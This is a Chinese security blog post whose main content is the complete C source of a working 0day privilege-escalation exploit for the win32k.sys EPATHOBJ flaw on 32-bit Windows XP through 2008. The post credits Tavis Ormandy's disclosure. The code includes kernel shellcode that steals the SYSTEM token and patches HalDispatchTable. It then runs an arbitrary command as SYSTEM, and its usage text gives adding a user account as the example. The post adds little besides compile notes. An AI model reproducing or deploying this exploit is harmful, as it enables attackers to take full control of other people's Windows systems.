提权EXP:最新windows 32位 EPATHOBJ 提权 0day exploit

  • A+
所属分类:Seay信息安全博客

显示不全请点击全屏阅读

Tavis Ormandy 在做压力测试的时候发现的这个漏洞.

see:
http://blog.cmpxchg8b.com/
http://seclists.org/fulldisclosure/2013/May/118

下面为利用代码:

代码:
#include <stdio.h>
#include <STDARG.H>
#include <stddef.h>
#include <windows.h>
//#include <ntstatus.h>

#pragma comment(lib, "gdi32")
#pragma comment(lib, "kernel32")
#pragma comment(lib, "user32")

#define MAX_POLYPOINTS (8192 * 3)
#define MAX_REGIONS 8192
#define CYCLE_TIMEOUT 10000

#pragma comment(linker, "/SECTION:.text,ERW")

//
// win32k!EPATHOBJ::pprFlattenRec uninitialized Next pointer testcase.
//
// Tavis Ormandy <taviso () cmpxchg8b com>, March 2013
//

POINT       Points[MAX_POLYPOINTS];
BYTE        PointTypes[MAX_POLYPOINTS];
HRGN        Regions[MAX_REGIONS];
ULONG       NumRegion = 0;
HANDLE      Mutex;

// Log levels.
typedef enum { L_DEBUG, L_INFO, L_WARN, L_ERROR } LEVEL, *PLEVEL;

VOID LogInit();
VOID LogRelase();
BOOL LogMessage(LEVEL Level, PCHAR Format, ...);

// Copied from winddi.h from the DDK
#define PD_BEGINSUBPATH   0x00000001
#define PD_ENDSUBPATH     0x00000002
#define PD_RESETSTYLE     0x00000004
#define PD_CLOSEFIGURE    0x00000008
#define PD_BEZIERS        0x00000010

#define ENABLE_SWITCH_DESKTOP  1

typedef struct  _POINTFIX
{
    ULONG x;
    ULONG y;
} POINTFIX, *PPOINTFIX;

// Approximated from reverse engineering.
typedef struct _PATHRECORD {
    struct _PATHRECORD *next;
    struct _PATHRECORD *prev;
    ULONG               flags;
    ULONG               count;
    POINTFIX            points[4];
} PATHRECORD, *PPATHRECORD;

PPATHRECORD PathRecord;
PATHRECORD  ExploitRecord = {0};
PPATHRECORD ExploitRecordExit;

typedef struct _RTL_PROCESS_MODULE_INFORMATION {
    HANDLE Section;                 // Not filled in
    PVOID MappedBase;
    PVOID ImageBase;
    ULONG ImageSize;
    ULONG Flags;
    USHORT LoadOrderIndex;
    USHORT InitOrderIndex;
    USHORT LoadCount;
    USHORT OffsetToFileName;
    UCHAR  FullPathName[ 256 ];
} RTL_PROCESS_MODULE_INFORMATION, *PRTL_PROCESS_MODULE_INFORMATION;

typedef struct _RTL_PROCESS_MODULES {
    ULONG NumberOfModules;
    RTL_PROCESS_MODULE_INFORMATION Modules[ 1 ];
} RTL_PROCESS_MODULES, *PRTL_PROCESS_MODULES;

typedef ULONG ( __stdcall *NtQueryIntervalProfile_ ) ( ULONG, PULONG );
typedef ULONG ( __stdcall *NtQuerySystemInformation_ ) ( ULONG, PVOID, ULONG, PULONG );
typedef ULONG ( __stdcall *NtAllocateVirtualMemory_ ) ( HANDLE, PVOID, ULONG, PULONG, ULONG, ULONG );
typedef ULONG ( __stdcall *NtFreeVirtualMemory_)( HANDLE, PVOID, PULONG, ULONG);

NtQueryIntervalProfile_  NtQueryIntervalProfile;
NtAllocateVirtualMemory_ NtAllocateVirtualMemory;
NtQuerySystemInformation_ NtQuerySystemInformation;
NtFreeVirtualMemory_ NtFreeVirtualMemory;
ULONG    PsInitialSystemProcess, PsReferencePrimaryToken, 
     PsGetThreadProcess, WriteToHalDispatchTable, FixAddress;

void _declspec(naked) ShellCode()
{
    __asm
    {
      pushad
      pushfd
      mov esi,PsReferencePrimaryToken
FindTokenOffset:
      lodsb
      cmp al, 8Dh;
      jnz FindTokenOffset
      mov edi,[esi+1]
      mov esi,PsInitialSystemProcess
      mov esi,[esi]
      push fs:[124h]
      mov eax,PsGetThreadProcess
      call eax
      add esi, edi
      push esi
      add edi, eax
      movsd
      
      ;add token ref count.
      pop esi
      mov esi, [esi]
      and esi, 0xFFFFFFF8
      lea eax, [esi-0x18]
      mov DWORD PTR [eax], 0x016B00B5
      ;fix the haltable
      mov eax, WriteToHalDispatchTable
      mov ecx, FixAddress
      mov [ecx], 0xC3
      mov DWORD PTR [eax], ecx

      popfd
      popad
      ;set ret code for NtQueryIntervalProfile
      mov eax, [esp+0xc]
      mov DWORD PTR [eax+4], 1
      mov DWORD PTR [eax+8], 0xC0000018
      xor eax, eax
      ret
    }
}

DWORD WINAPI WatchdogThread(LPVOID Parameter)
{
  //
    // This routine waits for a mutex object to timeout, then patches the
    // compromised linked list to point to an exploit. We need to do this.
    //

  LogMessage(L_INFO, "Watchdog thread %d waiting on Mutex", GetCurrentThreadId());
  
    if (WaitForSingleObject(Mutex, CYCLE_TIMEOUT) == WAIT_TIMEOUT) {
    
    //
        // It looks like the main thread is stuck in a call to FlattenPath(),
        // because the kernel is spinning in EPATHOBJ::bFlatten(). We can clean
        // up, and then patch the list to trigger our exploit.
        //

    while (NumRegion--)
            DeleteObject(Regions[NumRegion]);
    
        LogMessage(L_ERROR, "InterlockedExchange(0x%08x, 0x%08x);", &PathRecord->next, &ExploitRecord);
    
        InterlockedExchange((PLONG)&PathRecord->next, (LONG)&ExploitRecord);
    
    } else {
        LogMessage(L_ERROR, "Mutex object did not timeout, list not patched");
    }
  
    return 0;
}

void wellcome()
{
  printf("\t\tthe win32k.sys EPATHOBJ 0day exploit\n");
  printf("*******************************************************************\n");
  printf("***\texploit by:<progmboy> <[email protected]>\t\t***\n");
  printf("***\t0day finder:<Tavis Ormandy> <[email protected]>\t***\n");
  printf("***\ttested system:xp/2003/win7/2008 (*32bit*)\t\t***\n");
  printf("*******************************************************************\n");
}

void usage()
{
  printf("\nusage:\n<app> <cmd> <parameter>\n");
  printf("example:\napp.exe net \"user 111 111 /add\"");
}

BOOL 
FindAFixAddress(
  ULONG NtoskrnlBase)
{
  FixAddress = NtoskrnlBase + FIELD_OFFSET(IMAGE_DOS_HEADER, e_res2);
  LogMessage(L_INFO, "Get FixAddress --> 0x%08x", FixAddress);
  return TRUE;

}

// 0x602464FF; /*jmp esp+0x60*/
// 0x51C3686A; /*push 0; ret*/
DWORD CheckMagicDword()
{
  OSVERSIONINFOEX OSVer;
  DWORD dwMagic = 0;

    OSVer.dwOSVersionInfoSize = sizeof(OSVERSIONINFOEX);
    if(GetVersionEx((OSVERSIONINFO *)&OSVer)){
    switch(OSVer.dwMajorVersion){
    case 5:
      dwMagic = 0x602464FF;
      break;
    case 6:
      dwMagic = 0x642464FF;
      break;
    default:
      dwMagic = 0;
    }
  }
  return dwMagic;
}


int main(int argc, char **argv)
{
    HANDLE      Thread;
    HDC         Device;
    ULONG       Size;
    ULONG       PointNum;
  int nret = 0;
  
  DWORD MAGIC_DWORD = CheckMagicDword();
    ULONG AllocSize = 0x1000, status, NtoskrnlBase;
  RTL_PROCESS_MODULES  module;
  HMODULE ntoskrnl = NULL;
  DWORD dwFix;
  ULONG Address = MAGIC_DWORD & 0xFFFFF000;
  LONG ret;
  BOOL bRet = FALSE;
#ifdef ENABLE_SWITCH_DESKTOP
  HDESK hDesk;
#endif
    HMODULE  ntdll = GetModuleHandle( "ntdll.dll" );
  
  wellcome();

  if (argc < 2){
    usage();
    return -1;
  }

  if (!MAGIC_DWORD){
    LogMessage(L_ERROR, "unsupported system version\n");
    return -1;
  }

  LogInit();

  NtQueryIntervalProfile    =  (NtQueryIntervalProfile_)GetProcAddress( ntdll ,"NtQueryIntervalProfile" );
    NtAllocateVirtualMemory    =  (NtAllocateVirtualMemory_)GetProcAddress( ntdll ,"NtAllocateVirtualMemory" );
    NtQuerySystemInformation  =  (NtQuerySystemInformation_)GetProcAddress( ntdll ,"NtQuerySystemInformation" );
  NtFreeVirtualMemory =  (NtFreeVirtualMemory_)GetProcAddress( ntdll ,"NtFreeVirtualMemory" );
    if ( !NtQueryIntervalProfile || !NtAllocateVirtualMemory || 
     !NtQuerySystemInformation || !NtFreeVirtualMemory){
    LogMessage(L_ERROR, "get function address error\n");
    LogRelase();
    return -1;
  }
  
  //
  // try to allocate memory.
  //

  while (TRUE){
    ret = NtAllocateVirtualMemory( (HANDLE)-1, &Address, 0, &AllocSize, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE );
    if(ret < 0){
      MEMORY_BASIC_INFORMATION meminfo;
      LogMessage(L_ERROR, "allocate memory error code 0x%08x", ret);
      LogMessage(L_INFO, "try to free memory");
      if(VirtualQuery((LPVOID)Address, &meminfo, sizeof(meminfo))){
        LogMessage(L_INFO, "meminfo state %d %d\n", meminfo.State, meminfo.Protect);
      }
      ret = NtFreeVirtualMemory((HANDLE)-1, &Address, &AllocSize, MEM_RELEASE);
      if (ret < 0){
        LogMessage(L_ERROR, "free memory error code 0x%08x", ret);
        LogRelase();
        return -1;
      }
    }else{
      break;
    }
  }
  
  //
  // get the kernel info
  //

    status = NtQuerySystemInformation( 11, &module, sizeof(RTL_PROCESS_MODULES), NULL);//SystemModuleInformation 11
    if ( status != 0xC0000004 ){
    LogMessage(L_ERROR, "NtQuerySystemInformation error code:0x%08x\n", status);
        LogRelase();
    return -1;
  }
  
    NtoskrnlBase     =  (ULONG)module.Modules[0].ImageBase;
  
    //
    // 把ntoskrnl.exe加载进来
    //
  
    ntoskrnl = LoadLibraryA( (LPCSTR)( module.Modules[0].FullPathName + module.Modules[0].OffsetToFileName ) );
    if (ntoskrnl == NULL){
    LogMessage(L_ERROR, "LoadLibraryA error code:0x%08x\n", GetLastError());
        LogRelase();
    return -1;
  }
   
    //
    // 计算实际地址
    //
  
    WriteToHalDispatchTable =  (ULONG)GetProcAddress(ntoskrnl,"HalDispatchTable") - (ULONG)ntoskrnl + NtoskrnlBase + 4;
    PsInitialSystemProcess =  (ULONG)GetProcAddress(ntoskrnl,"PsInitialSystemProcess") - (ULONG)ntoskrnl + NtoskrnlBase;
    PsReferencePrimaryToken = (ULONG)GetProcAddress(ntoskrnl,"PsReferencePrimaryToken") - (ULONG)ntoskrnl + NtoskrnlBase;
    PsGetThreadProcess =  (ULONG)GetProcAddress(ntoskrnl,"PsGetThreadProcess") - (ULONG)ntoskrnl + NtoskrnlBase;
  
  if(!FindAFixAddress(NtoskrnlBase)){
    LogMessage(L_ERROR, "Can not Find A Fix Address\n");
    nret = -1;
    goto __end;
  }

  //
    // Create our PATHRECORD in user space we will get added to the EPATHOBJ
    // pathrecord chain.
    //

  PathRecord = (PPATHRECORD)VirtualAlloc(NULL,
                              sizeof(PATHRECORD),
                              MEM_COMMIT | MEM_RESERVE,
                              PAGE_EXECUTE_READWRITE);

    LogMessage(L_INFO, "Alllocated userspace PATHRECORD () %p", PathRecord);
  
  //
    // Initialize with recognizable debugging values.
    //

  FillMemory(PathRecord, sizeof(PATHRECORD), 0xCC);

    PathRecord->next    = PathRecord;
    PathRecord->prev    = (PPATHRECORD)(0x42424242);
  
  //
    // You need the PD_BEZIERS flag to enter EPATHOBJ::pprFlattenRec() from
    // EPATHOBJ::bFlatten(). We don't set it so that we can trigger an infinite
    // loop in EPATHOBJ::bFlatten().
    //

  PathRecord->flags   = 0;

    LogMessage(L_INFO, "  ->next  @ %p", PathRecord->next);
    LogMessage(L_INFO, "  ->prev  @ %p", PathRecord->prev);
    LogMessage(L_INFO, "  ->flags @ %u", PathRecord->flags);
  
  ExploitRecordExit = (PPATHRECORD)MAGIC_DWORD;
  ExploitRecordExit->next = NULL;
  ExploitRecordExit->next = NULL;
  ExploitRecordExit->flags = PD_BEGINSUBPATH;
  ExploitRecordExit->count = 0;
  

  ExploitRecord.next  = (PPATHRECORD)MAGIC_DWORD;
    ExploitRecord.prev  = (PPATHRECORD)WriteToHalDispatchTable;
    ExploitRecord.flags = PD_BEZIERS | PD_BEGINSUBPATH;
  ExploitRecord.count = 4;
  
    LogMessage(L_INFO, "Creating complex bezier path with %x", (ULONG)(PathRecord) >> 4);
  
  //
    // Generate a large number of Belier Curves made up of pointers to our
    // PATHRECORD object.
    //

  for (PointNum = 0; PointNum < MAX_POLYPOINTS; PointNum++) {
        Points[PointNum].x      = (ULONG)(PathRecord) >> 4;
        Points[PointNum].y      = (ULONG)(PathRecord) >> 4;
        PointTypes[PointNum]    = PT_BEZIERTO;
    }

  //
    // Switch to a dedicated desktop so we don't spam the visible desktop with
    // our Lines (Not required, just stops the screen from redrawing slowly).
    //
#ifdef ENABLE_SWITCH_DESKTOP
  hDesk = CreateDesktop( "DontPanic",
              NULL,
              NULL,
              0,
              GENERIC_ALL,
               NULL);
  if (hDesk){
    SetThreadDesktop(hDesk);
  }
#endif
  
  while (TRUE){

    BOOL bBreak = FALSE;

    Mutex = CreateMutex(NULL, TRUE, NULL);
    if (!Mutex){
      LogMessage(L_INFO, "Allocated %u HRGN objects", NumRegion);
      nret = -1;
      goto __end;
    }
    
    //
    // Get a handle to this Desktop.
    //

    Device = GetDC(NULL);
    
    //
    // Spawn a thread to cleanup
    //

    Thread = CreateThread(NULL, 0, WatchdogThread, NULL, 0, NULL);
    
    LogMessage(L_INFO, "start CreateRoundRectRgn");
    
    //
    // We need to cause a specific AllocObject() to fail to trigger the
    // exploitable condition. To do this, I create a large number of rounded
    // rectangular regions until they start failing. I don't think it matters
    // what you use to exhaust paged memory, there is probably a better way.
    //
    // I don't use the simpler CreateRectRgn() because it leaks a GDI handle on
    // failure. Seriously, do some damn QA Microsoft, wtf.
    //

    for (Size = 1 << 26; Size; Size >>= 1) {
      while (TRUE){
        HRGN hm = CreateRoundRectRgn(0, 0, 1, Size, 1, 1);
        if (!hm){
          break;
        }
        if (NumRegion < MAX_REGIONS){
          Regions[NumRegion] = hm;
          NumRegion++;
        }else{
          NumRegion = 0;
        }
      }
    }

    LogMessage(L_INFO, "Allocated %u HRGN objects", NumRegion);

    LogMessage(L_INFO, "Flattening curves...");
    
    //
    // Begin filling the free list with our points.
    //
    
    dwFix = *(PULONG)ShellCode;

    for (PointNum = MAX_POLYPOINTS; PointNum; PointNum -= 3) {
      BeginPath(Device);
      PolyDraw(Device, Points, PointTypes, PointNum);
      EndPath(Device);
      FlattenPath(Device);
      FlattenPath(Device);
      
      //
      // call the function to exploit.
      //

      ret = NtQueryIntervalProfile(2, (PULONG)ShellCode);
      
      //
      // we will set the status with 0xC0000018 in ring0 shellcode.
      //

      if (*(PULONG)ShellCode == 0xC0000018){
        bRet = TRUE;
        break;
      }
      
      //
      // fix
      //
      
      *(PULONG)ShellCode = dwFix;

      EndPath(Device);
    }
    
    if (bRet){
      LogMessage(L_INFO, "Exploit ok run command");
      ShellExecute( NULL, "open", argv[1], argc > 2 ? argv[2] : NULL, NULL, SW_SHOW);
      bBreak = TRUE;
    }else{
      LogMessage(L_INFO, "No luck, cleaning up. and try again..");
    }
    
    //
    // If we reach here, we didn't trigger the condition. Let the other thread know.
    //

    ReleaseMutex(Mutex);
    
    ReleaseDC(NULL, Device);
    WaitForSingleObject(Thread, INFINITE);

    if (bBreak){
      break;
    }

  }
__end:
  LogRelase();
  if (ntoskrnl)
    FreeLibrary(ntoskrnl);
#ifdef ENABLE_SWITCH_DESKTOP
  if (hDesk){
    CloseHandle(hDesk);
  }
#endif
    return nret;
}

CRITICAL_SECTION gCSection;

VOID LogInit()
{
  InitializeCriticalSection(&gCSection);
}

VOID LogRelase()
{
  DeleteCriticalSection(&gCSection);
}

//
// A quick logging routine for debug messages.
//

BOOL LogMessage(LEVEL Level, PCHAR Format, ...)
{
    CHAR Buffer[1024] = {0};
    va_list Args;
  
  EnterCriticalSection(&gCSection);

    va_start(Args, Format);
    _snprintf(Buffer, sizeof(Buffer), Format, Args);
    va_end(Args);

    switch (Level) {
        case L_DEBUG: fprintf(stdout, "[?] %s\n", Buffer); break;
        case L_INFO:  fprintf(stdout, "[+] %s\n", Buffer); break;
        case L_WARN:  fprintf(stderr, "[*] %s\n", Buffer); break;
        case L_ERROR: fprintf(stderr, "[!] %s\n", Buffer); break;
    }
  
    fflush(stdout);
    fflush(stderr);
  
  LeaveCriticalSection(&gCSection);

    return TRUE;
}
 
编译方式:vc6 release.
感谢Tavis Ormandy,以及其提供的poc

test on win7:

 
 

Tags:

提权EXP,

如果您喜欢我的博客,欢迎点击图片定订阅到邮箱填写您的邮件地址,订阅我们的精彩内容: 也可以点击链接【订阅到鲜果】

如果我的想法或工具帮助到了你,也可微信扫下方二维码打赏本人一杯咖啡
提权EXP:最新windows 32位 EPATHOBJ 提权 0day exploit